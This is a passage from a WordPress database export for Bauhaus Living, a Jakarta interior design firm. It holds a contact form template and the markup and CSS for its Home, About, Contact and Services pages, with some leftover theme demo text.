</label>\n\n[submit \"Submit\"]\n[_site_title] \"[your-subject]\"\n[_site_title] <wordpress@bauhaus.futuremediatrix.com>\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\n[_site_admin_email]\nReply-To: [your-email]\n\n0\n0\n\n[_site_title] \"[your-subject]\"\n[_site_title] <wordpress@bauhaus.futuremediatrix.com>\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\n[your-email]\nReply-To: [_site_admin_email]\n\n0\n0\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nPlease fill out this field.\nThis field has a too long input.\nThis field has a too short input.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe uploaded file is too large.\nThere was an error uploading the file.','Contact form 1','','publish','closed','closed','','contact-form-1','','','2022-11-14 03:28:18','2022-11-14 03:28:18','',0,'https://bauhaus.futuremediatrix.com/?post_type=wpcf7_contact_form&p=9',0,'wpcf7_contact_form','',0),(10,1,'2022-11-14 03:28:18','2022-11-14 03:28:18','','Default Kit','','publish','closed','closed','','default-kit','','','2022-11-14 04:20:56','2022-11-14 04:20:56','',0,'https://bauhaus.futuremediatrix.com/?p=10',0,'elementor_library','',0),(11,1,'2022-11-14 03:28:25','2022-11-14 03:28:25','','woocommerce-placeholder','','inherit','open','closed','','woocommerce-placeholder','','','2022-11-14 03:28:25','2022-11-14 03:28:25','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/11/woocommerce-placeholder.png',0,'attachment','image/png',0),(18,1,'2022-11-14 03:29:35','2022-11-14 03:29:35','','One Click Demo Import - log_file_2022-11-14__03-29-35','','inherit','open','closed','','one-click-demo-import-log_file_2022-11-14__03-29-35','','','2022-11-14 03:29:35','2022-11-14 03:29:35','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/11/log_file_2022-11-14__03-29-35.txt',0,'attachment','text/plain',0),(19,1,'2022-06-07 06:33:57','2022-06-07 06:33:57','','logo-black','','inherit','open','closed','','logo-black','','','2022-06-07 06:33:57','2022-06-07 06:33:57','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/logo-black.png',0,'attachment','image/png',0),(20,1,'2022-06-07 06:33:57','2022-06-07 06:33:57','','Logo-white','','inherit','open','closed','','logo-white','','','2022-06-07 06:33:57','2022-06-07 06:33:57','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png',0,'attachment','image/png',0),(22,1,'2022-06-07 06:57:40','2022-06-07 06:57:40','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/\" rel=\"bookmark\" title=\"High Quality, Effective &#038; Inspiring Built Space\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-03.jpg\" alt=\" High Quality, Effective &#038; Inspiring Built Space\">\n							</a>\n									24\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/\" rel=\"bookmark\" title=\"High Quality, Effective &#038; Inspiring Built Space\">\n								High Quality, Effective &#038; Inspiring Built Space							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									22\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3> Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living</h3>\n														<h2>\n								Wujudkan mimpi anda sekarang!							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','publish','closed','closed','','home-1','','','2023-09-26 13:14:13','2023-09-26 13:14:13','',0,'https://demo.ovatheme.com/retirio/?page_id=22',0,'page','',0),(23,1,'2022-06-07 06:57:28','2022-06-07 06:57:28','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-retirio-child','','','2022-06-07 06:57:28','2022-06-07 06:57:28','',0,'https://demo.ovatheme.com/retirio/2022/06/07/wp-global-styles-retirio-child/',0,'wp_global_styles','',0),(30,1,'2022-11-14 04:44:01','2022-06-07 06:59:32','','Home','','publish','closed','closed','','30','','','2022-11-14 04:44:01','2022-11-14 04:44:01','',0,'https://demo.ovatheme.com/retirio/?p=30',1,'nav_menu_item','',0),(38,1,'2022-06-07 07:01:22','2022-06-07 07:01:22','<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/file-1.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p> </p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Let\'s turn your ideas\ninto reality</h2>		\n							Get your quote or WhatsApp: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Commercial						</h4>\n					0\n				    			        						<h4>\n							Residential						</h4>\n					0\n				    			        						<h4>\n							Office						</h4>','About','','publish','closed','closed','','about','','','2023-09-22 09:52:23','2023-09-22 09:52:23','',0,'https://demo.ovatheme.com/retirio/?page_id=38',0,'page','',0),(40,1,'2022-06-07 07:01:36','2022-06-07 07:01:36','Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							<h3>contact us</h3>\n														<h2>\n								Saatnya Impian Anda Menjadi Kenyataan!							</h2>\n							<p> Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini temukan clarity kebutuhan kenyamanan Anda dan mulailah perjalanan menuju interior yang menginspirasi! </p>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:57px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','publish','closed','closed','','contact','','','2023-09-26 13:20:45','2023-09-26 13:20:45','',0,'https://demo.ovatheme.com/retirio/?page_id=40',0,'page','',0),(42,1,'2022-06-07 07:02:21','2022-06-07 07:02:21','<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n	        				<h4>\n					Architecture				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n	        				<h4>\n					Interior work				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n	        				<h4>\n					Renovation				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/decor-art/\"  title=\"Decor &#038; art\">\n	        				<h4>\n					Decor &#038; art				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/decor-art/\"  title=\"Decor &#038; art\">\n		</a>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>our benefits</h3>\n														<h2>\n								Why choose us?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n															<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>SERVICES WE DO</h3>\n														<h2>\n								Our highlighted services\nfor interior design							</h2>\n		    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/service-04-390x473.jpg\" alt=\"Architecture\">\n		    	<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n		        					<h4>\n						Architecture					</h4>\n				</a>\n									<p>\n						Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.					</p>\n				<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n				</a>\n		    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/service-02-390x453.jpg\" alt=\"Interior work\">\n		    	<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n		        					<h4>\n						Interior work					</h4>\n				</a>\n									<p>\n						Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.					</p>\n				<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n				</a>\n		    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/service-03-390x473.jpg\" alt=\"Renovation\">\n		    	<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n		        					<h4>\n						Renovation					</h4>\n				</a>\n									<p>\n						Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.					</p>\n				<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n				</a>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Services','','publish','closed','closed','','services','','','2022-11-14 